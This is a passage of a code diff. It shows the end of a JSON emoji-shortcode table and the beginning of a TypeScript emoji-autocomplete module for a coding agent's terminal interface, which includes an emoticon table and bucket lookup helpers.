👯"],["dango","🍡"],["dark_sunglasses","🕶"],["dart","🎯"],["dash","💨"],["date","📅"],["daydream","💭"],["dead","💀"],["deal","🤝"],["deciduous_tree","🌳"],["deer","🦌"],["delicious","😋"],["department_store","🏬"],["derelict_house","🏚"],["desert","🏜"],["desert_island","🏝"],["desktop_computer","🖥"],["diamond_shape_with_a_dot_inside","💠"],["diamonds","♦️"],["disappointed","😞"],["disappointed_relieved","😥"],["dislike","👎"],["dizzy","💫"],["dizzy_face","😵"],["dna","🧬"],["do_not_litter","🚯"],["dog","🐶"],["dog2","🐕"],["dollar","💵"],["dolls","🎎"],["dolphin","🐬"],["door","🚪"],["doughnut","🍩"],["dove","🕊"],["dragon","🐉"],["dragon_face","🐲"],["dream","💭"],["dress","👗"],["dromedary_camel","🐪"],["drooling_face","🤤"],["droplet","💧"],["drum","🥁"],["duck","🦆"],["dumpling","🥟"],["dvd","📀"]],"e":[["e-mail","📧"],["eagle","🦅"],["ear","👂"],["ear_of_rice","🌾"],["earth_africa","🌍"],["earth_americas","🌎"],["earth_asia","🌏"],["egg","🥚"],["eggplant","🍆"],["eight","8️⃣"],["eight_pointed_black_star","✴️"],["eight_spoked_asterisk","✳️"],["eject_button","⏏️"],["electric_plug","🔌"],["elephant","🐘"],["email","✉️"],["end","🔚"],["england","🏴󠁧󠁢󠁥󠁮󠁧󠁿"],["envelope_with_arrow","📩"],["euro","💶"],["european_castle","🏰"],["european_post_office","🏤"],["evergreen_tree","🌲"],["ew","🤮"],["exclamation","❗"],["exhausted","🥱"],["explode","💥"],["exploding_head","🤯"],["expressionless","😑"],["eye","👁"],["eyeglasses","👓"],["eyes","👀"]],"f":[["face_with_head_bandage","🤕"],["face_with_thermometer","🤒"],["facepalm","🤦"],["facepunch","👊"],["factory","🏭"],["fallen_leaf","🍂"],["family_man_boy","👨‍👦"],["family_man_boy_boy","👨‍👦‍👦"],["family_man_girl","👨‍👧"],["family_man_girl_boy","👨‍👧‍👦"],["family_man_girl_girl","👨‍👧‍👧"],["family_man_man_boy","👨‍👨‍👦"],["family_man_man_boy_boy","👨‍👨‍👦‍👦"],["family_man_man_girl","👨‍👨‍👧"],["family_man_man_girl_boy","👨‍👨‍👧‍👦"],["family_man_man_girl_girl","👨‍👨‍👧‍👧"],["family_man_woman_boy","👪"],["family_man_woman_boy_boy","👨‍👩‍👦‍👦"],["family_man_woman_girl","👨‍👩‍👧"],["family_man_woman_girl_boy","👨‍👩‍👧‍👦"],["family_man_woman_girl_girl","👨‍👩‍👧‍👧"],["family_woman_boy","👩‍👦"],["family_woman_boy_boy","👩‍👦‍👦"],["family_woman_girl","👩‍👧"],["family_woman_girl_boy","👩‍👧‍👦"],["family_woman_girl_girl","👩‍👧‍👧"],["family_woman_woman_boy","👩‍👩‍👦"],["family_woman_woman_boy_boy","👩‍👩‍👦‍👦"],["family_woman_woman_girl","👩‍👩‍👧"],["family_woman_woman_girl_boy","👩‍👩‍👧‍👦"],["family_woman_woman_girl_girl","👩‍👩‍👧‍👧"],["fart","💨"],["fast_forward","⏩"],["fax","📠"],["fearful","😨"],["female_detective","🕵️‍♀️"],["ferris_wheel","🎡"],["ferry","⛴"],["field_hockey","🏑"],["file_cabinet","🗄"],["file_folder","📁"],["film_projector","📽"],["film_strip","🎞"],["fingers_crossed","🤞"],["fire","🔥"],["fire_engine","🚒"],["fire_extinguisher","🧯"],["firecracker","🧨"],["fireworks","🎆"],["first_quarter_moon","🌓"],["first_quarter_moon_with_face","🌛"],["fish","🐟"],["fish_cake","🍥"],["fishing_pole_and_fish","🎣"],["fist","✊"],["fist_left","🤛"],["fist_right","🤜"],["fistbump","👊"],["five","5️⃣"],["flags","🎏"],["flashlight","🔦"],["flat_shoe","🥿"],["fleek","💯"],["fleur_de_lis","⚜"],["flight_arrival","🛬"],["flight_departure","🛫"],["floppy_disk","💾"],["flower_playing_cards","🎴"],["flushed","😳"],["flying_disc","🥏"],["flying_saucer","🛸"],["fml","💩"],["fog","🌫"],["foggy","🌁"],["foot","🦶"],["football","🏈"],["footprints","👣"],["fork_and_knife","🍴"],["fortune_cookie","🥠"],["fountain","⛲"],["fountain_pen","🖋"],["four","4️⃣"],["four_leaf_clover","🍀"],["fox_face","🦊"],["fr","💯"],["framed_picture","🖼"],["free","🆓"],["fried_egg","🍳"],["fried_shrimp","🍤"],["fries","🍟"],["frog","🐸"],["frowning","😦"],["frowning_face","☹"],["frowning_man","🙍‍♂️"],["frowning_woman","🙍"],["ftw","🏆"],["fu","🖕"],["fuelpump","⛽"],["full_moon","🌕"],["full_moon_with_face","🌝"],["funeral_urn","⚱"]],"g":[["game_die","🎲"],["gasp","😮"],["gear","⚙"],["gem","💎"],["gemini","♊"],["germs","😷"],["gg","🏆"],["ghost","👻"],["gift","🎁"],["gift_heart","💝"],["giraffe","🦒"],["girl","👧"],["gj","👏"],["globe_with_meridians","🌐"],["gloves","🧤"],["gm","☀️"],["gn","😴"],["gnight","😴"],["goal_net","🥅"],["goat","🐐"],["goggles","🥽"],["golf","⛳"],["golfing_man","🏌"],["golfing_woman","🏌️‍♀️"],["goodjob","👏"],["goodmorning","☀️"],["goodnight","😴"],["gorilla","🦍"],["gotcha","👌"],["grapes","🍇"],["grasshopper","🦗"],["green_apple","🍏"],["green_book","📗"],["green_heart","💚"],["green_salad","🥗"],["grey_exclamation","❕"],["grey_question","❔"],["grimacing","😬"],["grin","😁"],["grinning","😀"],["gtg","👋"],["guardsman","💂"],["guardswoman","💂‍♀️"],["guitar","🎸"],["gun","🔫"]],"h":[["haha","😆"],["hahaha","😆"],["haircut_man","💇‍♂️"],["haircut_woman","💇"],["hamburger","🍔"],["hammer","🔨"],["hammer_and_pick","⚒"],["hammer_and_wrench","🛠"],["hamster","🐹"],["hand_over_mouth","🤭"],["handbag","👜"],["handshake","🤝"],["hash","#️⃣"],["hatched_chick","🐥"],["hatching_chick","🐣"],["headphones","🎧"],["hear_no_evil","🙉"],["heart","❤️"],["heart_decoration","💟"],["heart_eyes","😍"],["heart_eyes_cat","😻"],["heartbeat","💓"],["heartpulse","💗"],["hearts","♥️"],["heavy_check_mark","✔️"],["heavy_division_sign","➗"],["heavy_dollar_sign","💲"],["heavy_heart_exclamation","❣"],["heavy_minus_sign","➖"],["heavy_multiplication_x","✖️"],["heavy_plus_sign","➕"],["hedgehog","🦔"],["helicopter","🚁"],["hello","👋"],["herb","🌿"],["hi","👋"],["hibiscus","🌺"],["high_brightness","🔆"],["high_heel","👠"],["highfive","🙏"],["hiking_boot","🥾"],["hippopotamus","🦛"],["hmm","🤔"],["hocho","🔪"],["hole","🕳"],["honey_pot","🍯"],["honeybee","🐝"],["hooray","🙌"],["horse","🐴"],["horse_racing","🏇"],["hospital","🏥"],["hot","🥵"],["hot_pepper","🌶"],["hotdog","🌭"],["hotel","🏨"],["hotsprings","♨️"],["hourglass","⌛"],["hourglass_flowing_sand","⏳"],["house","🏠"],["house_with_garden","🏡"],["houses","🏘"],["hug","🤗"],["hugs","🤗"],["huh","🤨"],["hushed","😯"]],"i":[["ice_cream","🍨"],["ice_hockey","🏒"],["ice_skate","⛸"],["icecream","🍦"],["id","🆔"],["ideograph_advantage","🉐"],["idk","🤷"],["ill","🤒"],["ily","❤️"],["imp","👿"],["inbox_tray","📥"],["incoming_envelope","📨"],["infinity","♾"],["information_source","ℹ️"],["innocent","😇"],["interrobang","⁉️"],["intoxicated","🥴"],["iphone","📱"],["izakaya_lantern","🏮"]],"j":[["jack_o_lantern","🎃"],["japan","🗾"],["japanese_castle","🏯"],["japanese_goblin","👺"],["japanese_ogre","👹"],["jealous","😒"],["jeans","👖"],["jelly","😒"],["jigsaw","🧩"],["joke","😜"],["joy","😂"],["joy_cat","😹"],["joystick","🕹"]],"k":[["kaaba","🕋"],["kangaroo","🦘"],["key","🔑"],["keyboard","⌨"],["keycap_ten","🔟"],["kick_scooter","🛴"],["kimono","👘"],["kiss","💋"],["kissing","😗"],["kissing_cat","😽"],["kissing_closed_eyes","😚"],["kissing_heart","😘"],["kissing_smiling_eyes","😙"],["kiwi_fruit","🥝"],["knockedout","😵"],["koala","🐨"],["koko","🈁"]],"l":[["labcoat","🥼"],["label","🏷"],["lacrosse","🥍"],["large_blue_circle","🔵"],["large_blue_diamond","🔷"],["large_orange_diamond","🔶"],["last_quarter_moon","🌗"],["last_quarter_moon_with_face","🌜"],["later","👋"],["latin_cross","✝"],["laughing","😆"],["leafy_greens","🥬"],["leaves","🍃"],["ledger","📒"],["left_luggage","🛅"],["left_right_arrow","↔️"],["left_speech_bubble","🗨"],["leftwards_arrow_with_hook","↩️"],["leg","🦵"],["legit","👌"],["lemon","🍋"],["leo","♌"],["leopard","🐆"],["level_slider","🎚"],["libra","♎"],["light_rail","🚈"],["link","🔗"],["lion","🦁"],["lips","👄"],["lipstick","💄"],["lizard","🦎"],["llama","🦙"],["lmao","😂"],["lmfao","🤣"],["lobster","🦞"],["lock","🔒"],["lock_with_ink_pen","🔏"],["lol","😂"],["lollipop","🍭"],["looking","👀"],["loop","➿"],["lotion_bottle","🧴"],["loud_sound","🔊"],["loudspeaker","📢"],["love","❤️"],["love_hotel","🏩"],["love_letter","💌"],["love_you","🤟"],["low_brightness","🔅"],["luggage","🧳"],["lying_face","🤥"]],"m":[["m","Ⓜ️"],["mad","😡"],["mag","🔍"],["mag_right","🔎"],["magnet","🧲"],["mahjong","🀄"],["mailbox","📫"],["mailbox_closed","📪"],["mailbox_with_mail","📬"],["mailbox_with_no_mail","📭"],["male_detective","🕵"],["man","👨"],["man_artist","👨‍🎨"],["man_astronaut","👨‍🚀"],["man_cartwheeling","🤸‍♂️"],["man_cook","👨‍🍳"],["man_dancing","🕺"],["man_elf","🧝‍♂️"],["man_facepalming","🤦‍♂️"],["man_factory_worker","👨‍🏭"],["man_fairy","🧚‍♂️"],["man_farmer","👨‍🌾"],["man_firefighter","👨‍🚒"],["man_genie","🧞‍♂️"],["man_health_worker","👨‍⚕️"],["man_in_lotus_position","🧘‍♂️"],["man_in_steamy_room","🧖‍♂️"],["man_in_tuxedo","🤵"],["man_judge","👨‍⚖️"],["man_juggling","🤹‍♂️"],["man_mechanic","👨‍🔧"],["man_office_worker","👨‍💼"],["man_pilot","👨‍✈️"],["man_playing_handball","🤾‍♂️"],["man_playing_water_polo","🤽‍♂️"],["man_scientist","👨‍🔬"],["man_shrugging","🤷‍♂️"],["man_singer","👨‍🎤"],["man_student","👨‍🎓"],["man_superhero","🦸‍♂️"],["man_supervillain","🦹‍♂️"],["man_teacher","👨‍🏫"],["man_technologist","👨‍💻"],["man_vampire","🧛‍♂️"],["man_with_gua_pi_mao","👲"],["man_with_turban","👳"],["man_zombie","🧟‍♂️"],["mango","🥭"],["mans_shoe","👞"],["mantelpiece_clock","🕰"],["maple_leaf","🍁"],["martial_arts_uniform","🥋"],["mask","😷"],["massage_man","💆‍♂️"],["massage_woman","💆"],["meat_on_bone","🍖"],["medal_military","🎖"],["medal_sports","🏅"],["mega","📣"],["meh","😐"],["melon","🍈"],["memo","📝"],["men_wrestling","🤼‍♂️"],["menorah","🕎"],["mens","🚹"],["mermaid","🧜‍♀️"],["merman","🧜‍♂️"],["metal","🤘"],["metro","🚇"],["microbe","🦠"],["microphone","🎤"],["microscope","🔬"],["milk_glass","🥛"],["milky_way","🌌"],["mindblown","🤯"],["minibus","🚐"],["minidisc","💽"],["mobile_phone_off","📴"],["money_mouth_face","🤑"],["money_with_wings","💸"],["moneybag","💰"],["monkey","🐒"],["monkey_face","🐵"],["monocle","🧐"],["monorail","🚝"],["moon_cake","🥮"],["morning","☀️"],["mortar_board","🎓"],["mosque","🕌"],["mosquito","🦟"],["motor_boat","🛥"],["motor_scooter","🛵"],["motorcycle","🏍"],["motorway","🛣"],["mount_fuji","🗻"],["mountain","⛰"],["mountain_biking_man","🚵"],["mountain_biking_woman","🚵‍♀️"],["mountain_cableway","🚠"],["mountain_railway","🚞"],["mountain_snow","🏔"],["mouse","🐭"],["mouse2","🐁"],["movie_camera","🎥"],["moyai","🗿"],["mrs_claus","🤶"],["muah","😘"],["muscle","💪"],["mushroom","🍄"],["musical_keyboard","🎹"],["musical_note","🎵"],["musical_score","🎼"],["mute","🔇"]],"n":[["nah","👎"],["nail_care","💅"],["name_badge","📛"],["nap","😴"],["national_park","🏞"],["nauseated_face","🤢"],["nazar_amulet","🧿"],["necktie","👔"],["negative_squared_cross_mark","❎"],["nerd_face","🤓"],["nervous","😅"],["neutral_face","😐"],["new","🆕"],["new_moon","🌑"],["new_moon_with_face","🌚"],["newspaper","📰"],["newspaper_roll","🗞"],["next_track_button","⏭"],["ng","🆖"],["night_with_stars","🌃"],["nighty","😴"],["nine","9️⃣"],["no_bell","🔕"],["no_bicycles","🚳"],["no_entry","⛔"],["no_entry_sign","🚫"],["no_good_man","🙅‍♂️"],["no_good_woman","🙅"],["no_mobile_phones","📵"],["no_mouth","😶"],["no_pedestrians","🚷"],["no_smoking","🚭"],["non-potable_water","🚱"],["nope","👎"],["noped","👎"],["nose","👃"],["notebook","📓"],["notebook_with_decorative_cover","📔"],["noted","📝"],["notes","🎶"],["nut_and_bolt","🔩"],["nvm","🤷"]],"o":[["o","⭕"],["o2","🅾️"],["ocean","🌊"],["octopus","🐙"],["oden","🍢"],["office","🏢"],["oil_drum","🛢"],["ok","🆗"],["ok_hand","👌"],["ok_man","🙆‍♂️"],["ok_woman","🙆"],["old_key","🗝"],["older_adult","🧓"],["older_man","👴"],["older_woman","👵"],["om","🕉"],["omg","😱"],["on","🔛"],["oncoming_automobile","🚘"],["oncoming_bus","🚍"],["oncoming_police_car","🚔"],["oncoming_taxi","🚖"],["one","1️⃣"],["oof","😬"],["oops","😬"],["open_book","📖"],["open_file_folder","📂"],["open_hands","👐"],["open_mouth","😮"],["open_umbrella","☂"],["ophiuchus","⛎"],["orange_book","📙"],["orange_heart","🧡"],["orthodox_cross","☦"],["ouch","🤕"],["outbox_tray","📤"],["owl","🦉"],["ox","🐂"]],"p":[["package","📦"],["page_facing_up","📄"],["page_with_curl","📃"],["pager","📟"],["paintbrush","🖌"],["palm_tree","🌴"],["palms_up","🤲"],["pancakes","🥞"],["panda_face","🐼"],["paperclip","📎"],["paperclips","🖇"],["parasol_on_ground","⛱"],["parking","🅿️"],["parrot","🦜"],["part_alternation_mark","〽️"],["partly_sunny","⛅"],["party","🥳"],["partying","🥳"],["passenger_ship","🛳"],["passport_control","🛂"],["pause_button","⏸"],["paw_prints","🐾"],["peace","✌"],["peace_symbol","☮"],["peach","🍑"],["peacock","🦚"],["peanuts","🥜"],["pear","🍐"],["peep","👀"],["pen","🖊"],["pencil2","✏️"],["penguin","🐧"],["pensive","😔"],["performing_arts","🎭"],["persevere","😣"],["person_fencing","🤺"],["petri_dish","🧫"],["phone","☎️"],["pick","⛏"],["pie","🥧"],["pig","🐷"],["pig2","🐖"],["pig_nose","🐽"],["pill","💊"],["pineapple","🍍"],["ping_pong","🏓"],["pirate_flag","🏴‍☠️"],["pisces","♓"],["pissed","🤬"],["pizza","🍕"],["place_of_worship","🛐"],["plate_with_cutlery","🍽"],["play_or_pause_button","⏯"],["pleading","🥺"],["pls","🙏"],["plz","🙏"],["point_down","👇"],["point_left","👈"],["point_right","👉"],["point_up","☝"],["point_up_2","👆"],["police_car","🚓"],["policeman","👮"],["policewoman","👮‍♀️"],["poodle","🐩"],["poop","💩"],["popcorn","🍿"],["post_office","🏣"],["postal_horn","📯"],["postbox","📮"],["potable_water","🚰"],["potato","🥔"],["pouch","👝"],["poultry_leg","🍗"],["pound","💷"],["pouting_cat","😾"],["pouting_man","🙎‍♂️"],["pouting_woman","🙎"],["praise","🙌"],["pray","🙏"],["prayer_beads","📿"],["pregnant_woman","🤰"],["pretzel","🥨"],["previous_track_button","⏮"],["prince","🤴"],["princess","👸"],["printer","🖨"],["puke","🤮"],["punch","👊"],["purple_heart","💜"],["purse","👛"],["pushpin","📌"],["put_litter_in_its_place","🚮"]],"q":[["question","❓"]],"r":[["rabbit","🐰"],["rabbit2","🐇"],["raccoon","🦝"],["racehorse","🐎"],["racing_car","🏎"],["rad","😎"],["radio","📻"],["radio_button","🔘"],["radioactive","☢"],["rage","😡"],["railway_car","🚃"],["railway_track","🛤"],["rainbow","🌈"],["rainbow_flag","🏳️‍🌈"],["raised_back_of_hand","🤚"],["raised_eyebrow","🤨"],["raised_hand","✋"],["raised_hand_with_fingers_splayed","🖐"],["raised_hands","🙌"],["raising_hand_man","🙋‍♂️"],["raising_hand_woman","🙋"],["ram","🐏"],["ramen","🍜"],["rat","🐀"],["receipt","🧾"],["record_button","⏺"],["recycle","♻️"],["red_car","🚗"],["red_circle","🔴"],["red_envelope","🧧"],["registered","®️"],["relaxed","☺️"],["relieved","😌"],["reminder_ribbon","🎗"],["repeat","🔁"],["repeat_one","🔂"],["rescue_worker_helmet","⛑"],["restroom","🚻"],["revolving_hearts","💞"],["rewind","⏪"],["rhinoceros","🦏"],["ribbon","🎀"],["rice","🍚"],["rice_ball","🍙"],["rice_cracker","🍘"],["rice_scene","🎑"],["right_anger_bubble","🗯"],["ring","💍"],["rip","⚰️"],["robot","🤖"],["rocket","🚀"],["rockon","🤘"],["rofl","🤣"],["roll_eyes","🙄"],["roller_coaster","🎢"],["rooster","🐓"],["rose","🌹"],["rosette","🏵"],["rotating_light","🚨"],["round_pushpin","📍"],["rowing_man","🚣"],["rowing_woman","🚣‍♀️"],["rugby_football","🏉"],["running_man","🏃"],["running_shirt_with_sash","🎽"],["running_woman","🏃‍♀️"]],"s":[["sa","🈂️"],["safety_pin","🧷"],["sagittarius","♐"],["sailboat","⛵"],["sake","🍶"],["salt","🧂"],["sandal","👡"],["sandwich","🥪"],["santa","🎅"],["satellite","📡"],["sauropod","🦕"],["saxophone","🎷"],["scared","😨"],["scarf","🧣"],["school","🏫"],["school_satchel","🎒"],["scissors","✂️"],["scorpion","🦂"],["scorpius","♏"],["scotland","🏴󠁧󠁢󠁳󠁣󠁴󠁿"],["scream","😱"],["scream_cat","🙀"],["scroll","📜"],["seat","💺"],["secret","㊙️"],["see_no_evil","🙈"],["seedling","🌱"],["selfie","🤳"],["seven","7️⃣"],["shallow_pan_of_food","🥘"],["shamrock","☘"],["shark","🦈"],["shaved_ice","🍧"],["sheep","🐑"],["shell","🐚"],["shh","🤫"],["shield","🛡"],["shinto_shrine","⛩"],["ship","🚢"],["shocked","😱"],["shopping","🛍"],["shopping_cart","🛒"],["shower","🚿"],["shrimp","🦐"],["shrug","🤷"],["shushing","🤫"],["shut","🤐"],["sick","🤒"],["signal_strength","📶"],["silly","😜"],["six","6️⃣"],["six_pointed_star","🔯"],["skateboard","🛹"],["ski","🎿"],["skier","⛷"],["skull","💀"],["skull_and_crossbones","☠"],["slay","😎"],["sled","🛷"],["sleep","💤"],["sleeping","😴"],["sleeping_bed","🛌"],["sleepy","😪"],["slightly_frowning_face","🙁"],["slightly_smiling_face","🙂"],["slot_machine","🎰"],["small_airplane","🛩"],["small_blue_diamond","🔹"],["small_orange_diamond","🔸"],["small_red_triangle","🔺"],["small_red_triangle_down","🔻"],["smh","🤦"],["smile","😄"],["smile_cat","😸"],["smiley","😃"],["smiley_cat","😺"],["smiling_face_with_three_hearts","🥰"],["smiling_imp","😈"],["smirk","😏"],["smirk_cat","😼"],["smoking","🚬"],["snail","🐌"],["snake","🐍"],["sneezing_face","🤧"],["snooze","💤"],["snowboarder","🏂"],["snowflake","❄️"],["snowman","⛄"],["snowman_with_snow","☃"],["soap","🧼"],["sob","😭"],["soccer","⚽"],["socks","🧦"],["softball","🥎"],["soon","🔜"],["sorceress","🧙‍♀️"],["sos","🆘"],["sound","🔉"],["space_invader","👾"],["spades","♠️"],["spaghetti","🍝"],["sparkle","❇️"],["sparkler","🎇"],["sparkles","✨"],["sparkling_heart","💖"],["speak_no_evil","🙊"],["speaker","🔈"],["speaking_head","🗣"],["speech_balloon","💬"],["speechless","😶"],["speedboat","🚤"],["spider","🕷"],["spider_web","🕸"],["spiral_calendar","🗓"],["spiral_notepad","🗒"],["sponge","🧽"],["spoon","🥄"],["squid","🦑"],["stadium","🏟"],["star","⭐"],["star2","🌟"],["star_and_crescent","☪"],["star_of_david","✡"],["star_struck","🤩"],["stars","🌠"],["station","🚉"],["statue_of_liberty","🗽"],["steak","🥩"],["steam_locomotive","🚂"],["stew","🍲"],["stop_button","⏹"],["stop_sign","🛑"],["stopwatch","⏱"],["straight_ruler","📏"],["strawberry","🍓"],["stuck_out_tongue","😛"],["stuck_out_tongue_closed_eyes","😝"],["stuck_out_tongue_winking_eye","😜"],["studio_microphone","🎙"],["stuffed_flatbread","🥙"],["sun_behind_large_cloud","🌥"],["sun_behind_rain_cloud","🌦"],["sun_behind_small_cloud","🌤"],["sun_with_face","🌞"],["sunflower","🌻"],["sunglasses","😎"],["sunny","☀️"],["sunrise","🌅"],["sunrise_over_mountains","🌄"],["surfing_man","🏄"],["surfing_woman","🏄‍♀️"],["sus","🤨"],["sushi","🍣"],["suspension_railway","🚟"],["swag","😎"],["swan","🦢"],["sweat","😓"],["sweat_drops","💦"],["sweat_smile","😅"],["sweet_potato","🍠"],["swimming_man","🏊"],["swimming_woman","🏊‍♀️"],["symbols","🔣"],["symbols_over_mouth","🤬"],["synagogue","🕍"],["syringe","💉"]],"t":[["t-rex","🦖"],["taco","🌮"],["tada","🎉"],["takeout_box","🥡"],["tanabata_tree","🎋"],["tangerine","🍊"],["tasty","😋"],["taurus","♉"],["taxi","🚕"],["tea","🍵"],["teddy_bear","🧸"],["telephone_receiver","📞"],["telescope","🔭"],["tennis","🎾"],["tent","⛺"],["test_tube","🧪"],["text","💬"],["thanks","🙏"],["thermometer","🌡"],["think","💭"],["thinking","🤔"],["thought_balloon","💭"],["thread","🧵"],["three","3️⃣"],["thumbsdown","👎"],["thumbsup","👍"],["thx","🙏"],["ticket","🎫"],["tickets","🎟"],["tiger","🐯"],["tiger2","🐅"],["timer_clock","⏲"],["tipping_hand_man","💁‍♂️"],["tipping_hand_woman","💁"],["tipsy","🥴"],["tired","😴"],["tired_face","😫"],["tm","™️"],["toilet","🚽"],["toilet_paper","🧻"],["tokyo_tower","🗼"],["tomato","🍅"],["tongue","👅"],["toolbox","🧰"],["tooth","🦷"],["top","🔝"],["tophat","🎩"],["tornado","🌪"],["trackball","🖲"],["tractor","🚜"],["traffic_light","🚥"],["train","🚋"],["train2","🚆"],["tram","🚊"],["triangular_flag_on_post","🚩"],["triangular_ruler","📐"],["trident","🔱"],["triumph","😤"],["trolleybus","🚎"],["trophy","🏆"],["tropical_drink","🍹"],["tropical_fish","🐠"],["truck","🚚"],["trumpet","🎺"],["tshirt","👕"],["ttyl","👋"],["tulip","🌷"],["tumbler_glass","🥃"],["turkey","🦃"],["turtle","🐢"],["tv","📺"],["twisted_rightwards_arrows","🔀"],["two","2️⃣"],["two_hearts","💕"],["two_men_holding_hands","👬"],["two_women_holding_hands","👭"],["ty","🙏"],["typing","💬"]],"u":[["u5272","🈹"],["u5408","🈴"],["u55b6","🈺"],["u6307","🈯"],["u6708","🈷️"],["u6709","🈶"],["u6e80","🈵"],["u7121","🈚"],["u7533","🈸"],["u7981","🈲"],["u7a7a","🈳"],["ugh","🙄"],["umbrella","☔"],["unamused","😒"],["underage","🔞"],["unicorn","🦄"],["unlock","🔓"],["up","🆙"],["upside_down_face","🙃"]],"v":[["v","✌"],["vertical_traffic_light","🚦"],["vhs","📼"],["vibration_mode","📳"],["video_camera","📹"],["video_game","🎮"],["violin","🎻"],["virgo","♍"],["volcano","🌋"],["volleyball","🏐"],["vomiting","🤮"],["vs","🆚"],["vulcan_salute","🖖"]],"w":[["wales","🏴󠁧󠁢󠁷󠁬󠁳󠁿"],["walking_man","🚶"],["walking_woman","🚶‍♀️"],["waning_crescent_moon","🌘"],["waning_gibbous_moon","🌖"],["warning","⚠️"],["wastebasket","🗑"],["watch","⌚"],["water_buffalo","🐃"],["watermelon","🍉"],["wave","👋"],["wavy_dash","〰️"],["waxing_crescent_moon","🌒"],["waxing_gibbous_moon","🌔"],["wc","🚾"],["weary","😩"],["wedding","💒"],["weight_lifting_man","🏋"],["weight_lifting_woman","🏋️‍♀️"],["weirdo","😜"],["whale","🐳"],["whale2","🐋"],["whatever","🙄"],["wheel_of_dharma","☸"],["wheelchair","♿"],["white_check_mark","✅"],["white_circle","⚪"],["white_flag","🏳"],["white_flower","💮"],["white_large_square","⬜"],["white_medium_small_square","◽"],["white_medium_square","◻️"],["white_small_square","▫️"],["white_square_button","🔳"],["whoa","😯"],["wilted_flower","🥀"],["wind_chime","🎐"],["wind_face","🌬"],["wine_glass","🍷"],["wink","😉"],["wizard","🧙‍♂️"],["woah","😱"],["wolf","🐺"],["woman","👩"],["woman_artist","👩‍🎨"],["woman_astronaut","👩‍🚀"],["woman_cartwheeling","🤸‍♀️"],["woman_cook","👩‍🍳"],["woman_elf","🧝‍♀️"],["woman_facepalming","🤦‍♀️"],["woman_factory_worker","👩‍🏭"],["woman_fairy","🧚‍♀️"],["woman_farmer","👩‍🌾"],["woman_firefighter","👩‍🚒"],["woman_genie","🧞‍♀️"],["woman_health_worker","👩‍⚕️"],["woman_in_lotus_position","🧘‍♀️"],["woman_in_steamy_room","🧖‍♀️"],["woman_judge","👩‍⚖️"],["woman_juggling","🤹‍♀️"],["woman_mechanic","👩‍🔧"],["woman_office_worker","👩‍💼"],["woman_pilot","👩‍✈️"],["woman_playing_handball","🤾‍♀️"],["woman_playing_water_polo","🤽‍♀️"],["woman_scientist","👩‍🔬"],["woman_shrugging","🤷"],["woman_singer","👩‍🎤"],["woman_student","👩‍🎓"],["woman_superhero","🦸‍♀️"],["woman_supervillain","🦹‍♀️"],["woman_teacher","👩‍🏫"],["woman_technologist","👩‍💻"],["woman_vampire","🧛‍♀️"],["woman_with_headscarf","🧕"],["woman_with_turban","👳‍♀️"],["woman_zombie","🧟‍♀️"],["womans_clothes","👚"],["womans_hat","👒"],["women_wrestling","🤼‍♀️"],["womens","🚺"],["woozy","🥴"],["world_map","🗺"],["worried","😟"],["wrench","🔧"],["writing_hand","✍"],["wtf","🤬"]],"x":[["x","❌"],["xo","💋"],["xoxo","💋"]],"y":[["yarn","🧶"],["yawn","😪"],["yay","🎉"],["yellow_heart","💛"],["yen","💴"],["yep","👍"],["yin_yang","☯"],["yo","👋"],["yum","😋"],["yummy","😋"],["yup","👍"]],"z":[["zany","🤪"],["zap","⚡"],["zebra","🦓"],["zero","0️⃣"],["zipper_mouth_face","🤐"],["zzz","💤"]]} diff --git a/packages/coding-agent/src/modes/emoji-autocomplete.ts b/packages/coding-agent/src/modes/emoji-autocomplete.ts new file mode 100644 index 000000000..cd6d77ebd --- /dev/null +++ b/packages/coding-agent/src/modes/emoji-autocomplete.ts @@ -0,0 +1,285 @@ +import type { AutocompleteItem } from "@oh-my-pi/pi-tui"; +import buckets from "./data/emojis.json" with { type: "json" }; + +// Bucket layout: `{ "<first-char>": [["<name>", "<emoji>"], ...] }`, with each +// bucket pre-sorted by name. Built offline by scripts/build-emojis.py +// so the runtime never has to allocate sorted arrays or filter flag sequences. +type Entry = readonly [name: string, char: string]; +const BUCKETS = buckets as unknown as Readonly<Record<string, readonly Entry[]>>; + +// Western text emoticons (`:D`, `;)`, `<3`, …) sit outside the `:name:` +// shortcode grammar, so they live in a hand-maintained table here rather than +// in `emojis.json`. Sorted longest-first so `:-)` wins over `:)` when both +// would match. +const EMOTICONS: ReadonlyArray<readonly [pattern: string, char: string]> = [ + [":'-(", "😢"], + [">:-(", "😠"], + [":-)", "🙂"], + [":-(", "🙁"], + [":-D", "😃"], + [":-P", "😛"], + [":-p", "😛"], + [":-O", "😮"], + [":-o", "😮"], + [":-|", "😐"], + [":-/", "😕"], + [":-\\", "😕"], + [":-*", "😘"], + [";-)", "😉"], + [";-P", "😜"], + [":')", "🥲"], + [":'D", "😂"], + [":'(", "😢"], + ["</3", "💔"], + [">:(", "😠"], + ["B-)", "😎"], + ["8-)", "😎"], + ["o.O", "😳"], + ["O.o", "😳"], + [":)", "🙂"], + [":(", "🙁"], + [":D", "😃"], + [":P", "😛"], + [":p", "😛"], + [":O", "😮"], + [":o", "😮"], + [":|", "😐"], + [":/", "😕"], + [":\\", "😕"], + [":*", "😘"], + [";)", "😉"], + [":3", "😺"], + ["<3", "❤️"], + ["xD", "😆"], + ["XD", "😆"], + ["B)", "😎"], + ["8)", "😎"], +]; + +const MAX_SUGGESTIONS = 12; + +function lowerBound(arr: readonly Entry[], target: string): number { + let lo = 0; + let hi = arr.length; + while (lo < hi) { + const mid = (lo + hi) >>> 1; + if (arr[mid]![0] < target) lo = mid + 1; + else hi = mid; + } + return lo; +} + +function lookupExact(name: string): string | undefined { + const bucket = BUCKETS[name[0] ?? ""]; + if (!bucket) return undefined; + const i = lowerBound(bucket, name); + const hit = bucket[i]; + return hit && hit[0] === name ? hit[1] : undefined; +} + +// Shortcode-name characters mirror the GitHub/gemoji grammar: `a-z`, `A-Z`, +// `0-9`, `_`, `+`, `-`. +function isNameCharCode(c: number): boolean { + return ( + (c >= 0x61 && c <= 0x7a) || + (c >= 0x41 && c <= 0x5a) || + (c >= 0x30 && c <= 0x39) || + c === 0x5f || + c === 0x2b || + c === 0x2d + ); +} + +// Token boundary to the left of an opening `:`: start-of-string or one of +// the punctuation characters we treat as a "fresh token" marker (whitespace, +// opening brackets, `>` for quoted blocks). +function hasLeftBoundary(text: string, colonIdx: number): boolean { + if (colonIdx === 0) return true; + const c = text.charCodeAt(colonIdx - 1); + return ( + c === 0x20 || // space + c === 0x09 || // tab + c === 0x0a || // \n + c === 0x0d || // \r + c === 0x28 || // ( + c === 0x5b || // [ + c === 0x7b || // { + c === 0x3e 